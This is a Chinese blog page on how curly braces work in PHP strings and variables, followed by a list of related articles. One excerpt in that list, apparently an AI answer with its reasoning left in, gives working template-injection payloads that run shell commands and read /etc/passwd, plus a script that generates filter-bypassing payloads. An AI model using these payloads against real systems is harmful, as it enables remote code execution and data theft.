php中大括号作用介绍

最新推荐文章于 2024-12-27 08:03:15 发布
转载 最新推荐文章于 2024-12-27 08:03:15 发布 · 767 阅读 · 0

{}大括号在php中的作用(PHP变量放在大括号里面的含义)

一、不管什么程序,function name(){}, for(){}, ….太多了,不说也知道做什么用了。 
二、$str{4}在字符串的变量的后面跟上{}刚大括号和中括号一样都是把某个字符串变量当成数组处理。 
三、{$val}这时候大括号起的作用就是,告诉PHP,括起来的要当成变量处理。 

复制代码代码如下:

$arr=array(0=>123, 'name'=>'你好'); 
foreach($array as $k=>$v){ 
echo "select * from blog_blogs where blog_tags like '%{$arr[$k]}%' order by blog_id"; //加一个大括号只是将作为变量的标志符 

echo '<br/ ><br/ ><br/ ><br/ ><br/ ><br/ ><br/ >'; 
foreach($array as $k=>$v){ 
echo "select * from blog_blogs where blog_tags like '%{{$arr[$k]}}%' order by blog_id"; //加两个大括号,外层的将作为普通的字符 

//用大括号来区分变量 
//echo "$arr['name']"; //用此句会报语法错误 
echo "{$arr['name']}"; //此句正常,大括号内的字符将作为变量来处理 
//$str{4} 在字符串的变量的后面跟上{} 大括号和中括号一样都是把某个字符串变量当成数组处理 
$str = 'abcdefg'; 
echo $str{4}; 


{}大括号在php中的作用(PHP变量放在大括号里面的含义) 

如:$sql = "insert into article (`channel_id`,`title`,`detail`,`pub_time`) values ('{$cid}','{$title}','{$detail}','{$time}');"; 
不加似乎也可以,加{}是什么意思呢? 
还有字段名 为什么要以``包括呢? 

============================================== 

至少便于阅读嘛~~~''是insert into语句要求的,因为字符串要成对出现嘛 
加{}有时候是为了防止变量名和后面的字符串连在一起嘛 
例如 
{$cid}dd 
如果cid=aa 
那么{$cid}dd=aadd 
不加的话你自己看看了$ciddd,岂不变成了ciddd变量了~~ 

PHP 变量后面加上一个大括号{},里面填上数字,就是指 PHP 变量相应序号的字符。 
例如: 
$str = 'hello'; 
echo $str{0}; // 输出为 h 
echo $str{1}; // 输出为 e 
如果要检查某个字符串是否满足多少长度,可以考虑用这种大括号(花括号)加 isset 的方式替代 strlen 函数,因为 isset 是语言结构,strlen 是函数,所以使用 isset 比使用 strlen 效率更高。 
比如判断一个字符串的长度是否小于 5: 
if ( !isset ( $str{5} ) ) 就比 if ( strlen ( $str ) < 5 ) 好。 


下面几个比较能说明原因的解释是: 

表示{}里面的是一个变量 ,执行时按照变量来处理 在字符串中引用变量使用的特殊包括方式,这样就可以不使用.运算符,从而减少代码的输入量了。 

其实输出那块是等同于print "hello ".$arr['fruit']; 

一、使用大括号的变量 
前一篇日志提到了,PHP Notice警告的是下面一句: 

switch (${action}.'_'.${child}) { 
初看并没有什么问题。我也查询了PHP手册上关于变量的定义:这里。 
1、可变变量的情况 
可见,与大部分资料一样,变量使用大括号的情况,在于“可变变量”(Variable variables)。其中提到: 


引用 
In order to use variable variables with arrays, you have to resolve an ambiguity problem. That is, if you write $$a[1] then the parser needs to know if you meant to use $a[1] as a variable, or if you wanted $$a as the variable and then the [1] index from that variable. The syntax for resolving this ambiguity is: ${$a[1]} for the first case and ${$a}[1] for the second. 
也就是说,为了在数组环境中也可以使用可变变量,因此,需要根据不同的情况,恰当的使用大括号{}限制变量的范围。${$a[1]} 与${$a}[1] 是完全不同的: 


引用 
${$a[1]} 这里$a[1]是一个变量; 
${$a}[1] 这里$a是一个变量; 
2、定界、避免歧义 
实际上,这情况与可变变量时类似。例如,若使用“.”连接符,连接一个字符串,可能是这样: 

echo $str.'_2010'; 
用大括号来写,可能更简单: 

echo "${str}_2010"; 
可见,如果没有大括号,则可能把$str_2010整个作为一个变量来处理。当然,这样的写法,只能用在双引号中,单引号里面是不会执行变量替换的。 

3、字符串变量中的单个字符 
例如: 
复制代码代码如下:

<?php 
$str='000'; 
$str{0}='1'; 
echo $str; //输出为100 
?> 

这不难理解,与中括号[]的作用是一致的,有点类似Python中把字符串看成对象的情况。所以,下面的语句功能相同: 
复制代码代码如下:

<?php 
$str='000'; 
$str[0]='1'; 
echo $str; //也是输出100 
?> 

不过,这些都不是我想说明的内容,真正想描述的情况,请见下面。 

二、变量使用大括号的异同 
首先,把PHP的错误信息输出全部打开,即/etc/php.ini 为: 


引用 
error_reporting = E_ALL 
display_errors = On 
然后,打开测试页面,其中代码为: 
复制代码代码如下:

<?php 
$test='123'; 
echo $test; 
echo "${test}"; 
echo "{$test}"; 
echo ${test}.'_'; 
echo ${test}; 
?> 

你会看到如下的结果: 


引用 
123123123 
Notice: Use of undefined constant test - assumed 'test' in /var/www/html/phpcrm/testpages/variables.php on line 6 
123_ 
Notice: Use of undefined constant test - assumed 'test' in /var/www/html/phpcrm/testpages/variables.php on line 7 
123 
这说明什么? 
1、可接受的写法 
从输出结果中“123123123”,表明前面三行的echo语句都是正常的: 
复制代码代码如下:

echo $test; 
echo "${test}"; 
echo "{$test}"; 

2、不建议的写法 
后面的两行都有Notice警告,也就是曾把test变量看成常量,只是后来才假设为变量来处理的。因此,为了避免歧义和冲突,不建议这样写: 
复制代码代码如下:

echo ${test}.'_'; 
echo ${test}; 

不过,可以有一种变通的写法 
复制代码代码如下:

echo ${'test'}.'_'; 
echo ${'test'}; 

这样写的话就不会报错了 
3、不正确的写法 
网上不少资料介绍,${var}与{$var}的作用是一样的。但是,如果你再加入一句: 

echo {$test}; 
那么,你将会得到以下错误信息: 


引用 
Parse error: syntax error, unexpected '{' in /var/www/html/phpcrm/testpages/variables.php on line 8 
这可不是Notice警告,是错误,因解析问题,程序将不能正常运行。 

三、总结 
结合前面两部分的内容,我相信,对于变量引用时使用大括号,应遵循以下原则: 


引用 
1、正确的写法为:${var} 的形式; 
2、与双引号一同使用; 
3、根据需表达的意思进行定界。 
所以,最后我把switch一行改为: 

switch ("${action}_${child}") { 
即不再出现Notice警告。


python中括号作用_浅析python 中大括号括号括号的区分
weixin_39536728的博客
11-21 2826
python语言最常见的括号有三种,分别是:小括号( )、中括号[ ]和大括号也叫做花括号{ }。其作用也各不相同,分别用来代表不同的python基本内置数据类型。1.python中的括号( ):代表tuple元组数据类型,元组是一种不可变序列。创建方法很简单,大多时候都是用小括号括起来的。>>> tup = (1,2,3)>>> tup(1, 2, 3)>>>>>> ()#空元组()>>>>>...
浅析python 中大括号括号括号的区分
09-18
python语言最常见的括号有三种,分别是:小括号( )、中括号[ ]和大括号也叫做花括号{ }。这篇文章主要介绍了python 中大括号括号括号的区分,需要的朋友可以参考下
php中的大括号用法
xiaoxiaoniaoer1的专栏
07-05 1570
一、不管什么程序,function name(){}, for(){}, ….太多了,不说也知道做什么用了。 二、$str{4}在字符串变量的后面跟上{}刚大括号和中括号一样都是把某个字符串变量当成数组处理。 三、{$val}这时候大括号起的作用就是,告诉PHP,括起来的要当成变量处理。 复制代码 代码如下: $arr=array(0=>123, 'name'=>'你好');
PHP中大括号作用
soos的博客
02-26 344
一、不管什么程序,function fnname(){},for(){}, ….这太多了,都表示一段代码使用的区域(代码域)。 二、$str{1}在字符串变量的后面跟上{}刚大括号和中括号一样都是把某个字符串变量当成数组处理,获取该下标所对应的值。 三、{$val},这时候大括号起的作用就是,告诉PHP,括起来的要当成变量处理。 $arr=array('age'=>18,"sex"=>'女','name'=>'Tom'); echo $arr['age'];//18 //ec..
php中大括号{}的用处总结
yang958554999的博客
09-30 428
总结: 1:大括号{}主要用在,双引号""内 2:大括号{}内的内容,将看成一个整体 3:PHP分析双引号中的数据是否含有变量(并解析它的值),当用双引号时,{}用来界定变量的界限 4:单引号’'是无法解析变量的,也包括{}内的变量,会被当成字符串输出 一、代码实例: <?php // 例1: $arr=['name'=>'yang','age'=>20]; // 数组的读...
PHP中大括号{}用法实例总结
12-18
PHP编程语言中,大括号`{}`扮演着多种角色,它们的用法非常关键,可以帮助编写...此外,对于其他编程语言,如C、C++、Java等,大括号也有类似但不尽相同的作用,因此理解这些基础概念对于跨语言编程是非常有帮助的。
php json_encode值中大括号与花括号区别
12-19
1.当array是一个从0开始的连续数组时,json_encode出来的结果是一个由[]括起来的字符串 而当array是不从0开始或者不连续的数组时,json_encode出来的结果是一个由{}括起来的key-value模式的字符串 ...
PHP中大括号'{}'用法实例总结
10-20
以上就是PHP中大括号“{}”的主要用法。掌握了这些用法,可以极大地提高PHP代码的编写效率和可读性。对于初学者而言,了解大括号的这些用法是构建扎实PHP基础的必要步骤。同时,对于经验丰富的开发者来说,熟悉并...
php中大括号作用
womenzaiqianfang的专栏
05-11 170
php中大括号作用,如下: 一、不管什么程序,function name(){}, for(){}, ….这太多了,不说也知道什么用了。 二、$str{4}在字符串变量的后面跟上{}刚大括号和中括号一样都是把某个字符串变量当成数组处理 三、{$val},这时候大括号起的作用就是,告诉PHP,括起来的要当成变量处理。 $arr=array(0=>123, 'name'=>'小猪...
python循环括号_Python3中小括号()、中括号[]、花括号{}的区别详解
weixin_39634997的博客
11-26 723
介绍在python语言中最常见的括号有三种,分别是:小括号()、中括号[]、花括号{};其作用也不相同,分别用来代表不同的python基本内置数据类型。小括号()python中的括号():代表tuple元祖数据类型,元祖是一种不可变序列。示例>>> a = (12,23)>>> a(12, 23)>>> () #空元祖()>>> 1, #一个值的元祖(1,)中括号[]python中的括号[]...
python大括号用法_Python中各种括号的区别、用途及使用方法
weixin_39639518的博客
11-21 1万+
python语言最常见的括号有三种,分别是:小括号( )、中括号[ ]和大括号也叫做花括号{ }。其作用也各不相同,分别用来代表不同的python基本内置数据类型。小括号( ):代表tuple元组数据类型、中括号[ ]:代表list列表数据类型、大括号{ }花括号:代表dict字典数据类型python中的括号( ):代表tuple元组数据类型,元组是一种不可变序列。创建方法很简单,大多时候都是用...
python 中括号与冒号的作用
xylyounj的博客
09-13 1万+
(1) 中括号[ ]:用于定义列表或引用列表、数组、字符串及元组中元素位置,如 list1 = ['physics', 'chemistry', 1997, 2000],array1 = np.array([[1,2,3],[4,5,6]]) (二维数组第一下标对应行、第二下标对应列) (2)小括号():用于定义元组,如 tul1 = ('a', 'b', 'c', 'd', 'e', [[
python中几种括号的用法()、[]、{} 举例说明
热门推荐
Alex的博客
03-08 15万+
在Python语言中最常见的括号有三种,分别是:小括号()、中括号[]、花括号{};其作用也不相同,分别用来代表不同的Python基本内置数据类型。因博主是java出身,所以会举一些Java的类比。python不像java需要在定义的时候强制定义类型,所以括号就是几种基本数据类型。 Python中的括号():tuple 代表tuple元组数据类型,元祖是一种不可变序列。创建方法很简单,大多数时候都是小括号括起来的。这个类似java中的数组,定义后内容不可变 Python中的括号[]:list
PHP中的大括号(花括号{})使用详解
zhenhuaYang 的个人博客
03-06 1万+
php中使用大括号基本有如下三种情况,下面本篇文章对这三种使用情况做一个总结。一、function name(){}, for(){}等等这种情况就不多说了,不说也知道是做什么用的了。二、$str{4}在字符串变量的后面跟上{}大括号或者中括号[],里面填写了数字,这里是吧字符串变量当成数组处理。举个例子如下:<?php $str='phpernote.com'; echo $str{0}; /
Python中最常见括号()、[]、{}的区别
qq_39595615的博客
09-10 866
Python中的括号():代表tuple元祖数据类型,元祖是一种不可变序列, tup = (1,2,3) Python中的括号[]: 代表list列表数据类型,列表是一种可变序列。创建方法既简单又特别。 Python中的括号{}: 代表dict字典数据类型,字典是Python中唯一内建的映射类型。字典中的值没有特殊的顺序,但都是存储在一个特定的键(key)下。键可以是数字、字符串甚...
python中的大括号{}的用法
LRJ的博客
05-21 4064
在这个例子中,{epoch:03d}表示将epoch变量插入到字符串中,并使用3位数字进行填充,如果数字不足3位,则在前面添加零。{val_loss:.4f}表示将val_loss变量插入到字符串中,并使用4位小数进行填充。在Python中,{}是格式化字符串的占位符,用于指示在字符串中插入变量位置
Python小括号( )、中括号[ ]和大括号{}代表什么
natural_Caduceus
12-27 1085
python语言最常见的括号有三种,分别是:小括号( )、中括号[ ]和大括号也叫做花括号{ },分别用来代表不同的python基本内置数据类型。python中的括号( ):代表tuple元组数据类型,元组是一种不可变序列, 它,并且这些元素在元组中是按照特定的顺序排列的。尽管元组内的元素不能直接修改,但可以通过创建新的元组来实现类似修改的效果。
ssti过滤大括号脚本
最新发布
04-02
<think>好的,我现在需要帮助用户找到绕过SSTI中大括号过滤的方法或脚本。首先,我需要理解用户的问题。用户提到SSTI(服务器端模板注入)中的大括号被过滤,想要绕过这种限制。根据提供的引用资料,特别是引用[2]和[4],里面提到了Python中的一些绕过技巧,比如利用字符串拼接和属性链访问。 首先,用户可能需要知道如何在不使用大括号的情况下执行模板注入。例如,在Jinja2中,通常使用`{{...}}`来插入表达式,但如果这些大括号被过滤了,就需要其他方法。引用[4]提到,在Python中可以使用字符串拼接,比如`'l''s'`会被视为`'ls'`,这可能帮助绕过某些过滤机制。 接下来,考虑替代的模板语法。比如,在Jinja2中,`{% ... %}`用于执行语句,但这也可能被过滤。不过,如果应用允许其他模板语法,比如使用`${...}`或者`#{...}`,可能可以绕过,但这取决于具体的模板引擎。 然后,回顾引用[2]中的例子,使用类的继承链来访问危险函数。例如,通过`''.__class__.__mro__[2].__subclasses__()`来获取需要的子类,进而执行命令或读写文件。这里的关键是构造这样的链式调用而不显式使用大括号。可能需要利用其他符号或语法,比如使用中括号或点号来访问属性。 另外,引用[4]中的案例展示了如何通过拼接字符串来绕过关键字检测。比如,将`dir`拆分为`'d'+'i'+'r'`,或者将`os`拆分为`'o'+'s'`。这种方法可以避免直接出现被过滤的关键字,同时允许动态构造所需的函数调用。 还需要考虑是否有其他方式注入模板代码。例如,利用模板引擎的注释语法、变量替换或者其他内置函数。例如,在Velocity模板中,可以使用`#set`指令来执行代码,或者利用反射机制调用方法。 不过,用户可能更关注Python环境下,特别是Jinja2的绕过方法。此时,可以建议尝试使用`{% if ... %}`标签来执行代码,或者利用`request.args`或`request.values`来获取参数,从而动态构造payload。 另外,如果大括号被过滤,可能需要使用HTML编码或其他编码方式来绕过。例如,使用`{`代替`{`,但这取决于模板引擎是否解析这些编码。 还有,可以考虑使用模板引擎的沙盒逃逸技术。例如,通过访问内置的命名空间,如`__builtins__`,或者利用已有的对象(如空字符串、数组)的类继承链来访问危险模块,如`os`或`subprocess`。 总结一下,可能的绕过方法包括:字符串拼接、利用其他模板标签、属性链访问、编码绕过、沙盒逃逸等。需要根据具体的过滤规则和模板引擎类型来选择合适的方法。</think>针对SSTI(服务器端模板注入)中大括号$\\{\\}$过滤的绕过方法,可通过以下技术实现: --- ### 一、利用字符串拼接绕过关键字过滤(Python/Jinja2) 当大括号被过滤时,可通过字符串拼接构造表达式: ```python # 示例:执行命令"ls" {{ ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['linecache'].__dict__['o'+'s'].system('l''s') }} ``` - **关键点**:使用`'o'+'s'`代替`os`,`'l''s'`代替`ls`,避免直接出现敏感字符[^4]。 --- ### 二、使用替代语法标签(Jinja2) 若`{{`被过滤,尝试使用其他模板标签: ```python {% set x = 'os' %}{% set y = 'system' %}{% set cmd = 'id' %}{{ self.__init__.__globals__.__getitem__(x).__getattr__(y)(cmd) }} ``` - **原理**:利用`{% %}`标签定义变量,间接调用危险函数[^4]。 --- ### 三、利用属性链访问绕过符号限制 通过对象继承链访问敏感模块: ```python # 示例:读取文件 {{ request.__class__.__mro__[1].__subclasses__()[182].__init__.__globals__.__builtins__.open('/etc/passwd').read() }} ``` - **说明**:通过`request`对象的属性链访问`__builtins__.open`函数[^2]。 --- ### 四、编码绕过技术 对关键字进行编码转换(如十六进制、ASCII码): ```python # 十六进制编码示例 {{ ''.__class__.__base__.__subclasses__()[72].__init__.__globals__['\x6f\x73'].system('\x6c\x73') }} ``` - **效果**:绕过基于字符串匹配的过滤规则。 --- ### 五、利用沙盒逃逸技术(通用) 通过反射或内置函数调用底层模块: ```python # 调用os模块执行命令 {{ ''.__class__.__mro__[2].__subclasses__()[128].__init__.__globals__['popen']('whoami').read() }} ``` - **原理**:利用`subprocess.Popen`执行系统命令。 --- ### 六、使用非大括号语法(其他模板引擎) 不同模板引擎的替代语法: 1. **Velocity(Java)**:使用`#set`指令构造代码执行: ```java #set($exec="")${new java.lang.ProcessBuilder("id").start()} ``` 2. **Twig(PHP)**:利用`_self`对象调用系统函数: ```php {{ _self.env.registerUndefinedFilterCallback("system") }}{{ _self.env.getFilter("id") }} ``` --- ### 自动化脚本示例(Python) 以下脚本通过替换和拼接生成绕过Payload: ```python def generate_ssti_payload(cmd): parts = { "os": "'o'+'s'", "cmd": "+".join(f"'{c}'" for c in cmd) } payload = f"{{{{ ''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__[{parts['os']}].system({parts['cmd']}) }}}}" return payload.replace("{", "%7B").replace("}", "%7D") # URL编码绕过 print(generate_ssti_payload("ls")) ``` --- ### 防御建议 1. 严格限制用户输入,禁止传入模板控制符号。 2. 使用沙盒环境运行模板引擎,限制内置模块访问[^3]。 3. 对渲染内容进行输出编码,避免注入生效。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值